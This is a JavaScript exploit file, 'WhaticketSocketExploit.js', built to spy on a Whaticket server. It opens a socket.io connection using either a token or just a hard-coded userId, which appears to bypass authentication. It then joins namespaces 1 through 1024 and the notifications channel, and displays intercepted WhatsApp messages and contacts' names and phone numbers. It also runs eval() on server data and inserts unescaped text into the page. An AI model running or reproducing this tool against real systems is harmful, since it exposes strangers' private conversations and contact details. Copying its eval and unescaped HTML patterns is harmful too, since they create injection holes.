WhaticketSocketExploit.js

const runTest = (backend_url, token) => {
  let userId = 1

  spyMessages = window.document.getElementById("spyMessages");
  spyContacts = window.document.getElementById("spyContacts");
  spyOthers = window.document.getElementById("spyOthers");

  let spySocket = null;

  if (token) {
    spySocket = new WebSocket(`${backend_url}/socket.io/?token=${token}&EIO=4&transport=websocket`);
  } else {
    spySocket = new WebSocket(`${backend_url}/socket.io/?userId=${userId}&EIO=4&transport=websocket`);
  }

  spyOthers.insertAdjacentHTML("afterbegin", "<h3>Initialized</h3>");
  spySocket.onmessage = function(event) {
    if (event.data.startsWith("0{")) {
      setTimeout(() => {
        spyOthers.insertAdjacentHTML("afterbegin", "<pre>Sending handshake</pre>");
        spySocket.send("40");
        spyOthers.insertAdjacentHTML("afterbegin", "<pre>Connecting to namespaces from 1 to 1024</pre>");
        for (n=1; n<=1024; n++) {
          spySocket.send(`40/${n},`);
        }
      }, 1000);
    } else if (event.data === "2") {
      spySocket.send("3");
    } else if (event.data.startsWith("40{")) {
      spyOthers.insertAdjacentHTML("afterbegin", "<pre>Received handshake</pre>");
      setTimeout(() => {
        spyOthers.insertAdjacentHTML("afterbegin", "<pre>Joining notifications channel</pre>");
        spySocket.send('42["joinNotification"]');
      }, 2000);
    } else if (event.data.startsWith("42")) {
      data = eval(event.data.substr(event.data.indexOf(',')+1));
      console.log(data);
      if (data[0].endsWith('appMessage')) {
        if (data[1]?.message?.body) {
          spyMessages.insertAdjacentHTML("afterbegin", `
           <div class="message">
             <b>From:</b> ${data[1].message.fromMe ? "Me" : data[1].message.remoteJid}<br>
             <b>Message:</b> ${data[1].message.body}
           </div>          
           `);
        }
      } else if (data[0].endsWith('contact')) {
        if (data[1]?.contact?.name) {
          spyContacts.insertAdjacentHTML("afterbegin", `
           <div class="contact">
             <b>Name:</b> ${data[1].contact.name}<br>
             <b>Number:</b> ${data[1].contact.number}
           </div>          
           `);
        }
      } else {
        spyOthers.insertAdjacentHTML("afterbegin", "<pre>" + JSON.stringify(data) + "</pre>");
      }
    }
  }
}

window.addEventListener("load", (_) => {
  document.getElementById("modalbackdrop").style.display = "block";
  document.getElementById("inputbox").style.display = "block";
  document.getElementById("input_ok").addEventListener("click", (_) => {
    document.getElementById("modalbackdrop").style.display = "none";
    document.getElementById("inputbox").style.display = "none";
    let backend_host = document.getElementById("backend_host").value;
    let enable_ssl = document.getElementById("enable_ssl").checked;
    let token = document.getElementById("token").value;

    let url = null;
    try {
      url = new URL(backend_host);
      if (url && url.host) {
        backend_host = url.host;
      }
    } catch (_) {

    }

    let backend_url = (enable_ssl ? "wss://" : "ws://") + backend_host;

    runTest(backend_url, token);
  });
});